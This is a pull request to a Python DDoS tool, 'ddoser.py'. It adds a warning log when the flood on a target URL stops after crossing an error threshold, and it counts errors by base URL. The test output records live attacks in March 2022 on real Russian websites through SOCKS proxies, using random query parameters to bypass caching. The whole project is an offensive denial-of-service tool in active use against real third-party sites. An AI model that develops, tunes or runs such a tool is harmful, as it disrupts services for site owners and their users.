### PR TITLE
Log message when attack is stopped due to a threshold

### DIFF
--- a/ddoser.py
+++ b/ddoser.py
@@ -118,7 +118,15 @@ async def ddos(
     while True:
         if count and step > count:
             break
-        if stop_attack and URL_ERRORS_COUNT[target_url] > stop_attack:
+
+        error_count = URL_ERRORS_COUNT[target_url]
+        if stop_attack and error_count > stop_attack:
+            logging.warning(
+                "Stopping attack on %s as the error count %d is more than the threshold %d",
+                target_url,
+                error_count,
+                stop_attack,
+            )
             break
         step += 1
         proxy = get_proxy(proxy_iterator)

--- a/ddoser.py
+++ b/ddoser.py
@@ -119,7 +119,8 @@ async def ddos(
         if count and step > count:
             break
 
-        error_count = URL_ERRORS_COUNT[target_url]
+        base_url = target_url.split('?', 1)[0]
+        error_count = URL_ERRORS_COUNT[base_url]
         if stop_attack and error_count > stop_attack:
             logging.warning(
                 "Stopping attack on %s as the error count %d is more than the threshold %d",


### PR DESCRIPTION
Log a message when attack is stopped on a url.

Test:
[14-03-2022 05:31:59] WARNING:  Url: https://www.tutu.ru/poezda/vkz/%D0%B2%D0%BE%D0%BA%D0%B7%D0%B0%D0%BB%D1%8B_%D0%9C%D0%BE%D1%81%D0%BA%D0%B2%D1%8B/?param_93=21710 Proxy: 181.15.154.156:52033#socks4 Error(<class 'asyncio.exceptions.TimeoutError'>):
[14-03-2022 05:31:59] WARNING:  Stopping attack on https://www.tutu.ru/poezda/vkz/%D0%B2%D0%BE%D0%BA%D0%B7%D0%B0%D0%BB%D1%8B_%D0%9C%D0%BE%D1%81%D0%BA%D0%B2%D1%8B/ as the error count 737 is more than the threshold 500
[14-03-2022 05:31:59] WARNING:  Url: https://mtischr.ru/?param_484=73803 Proxy: 103.52.252.18:5678#socks4 Error(<class 'asyncio.exceptions.TimeoutError'>):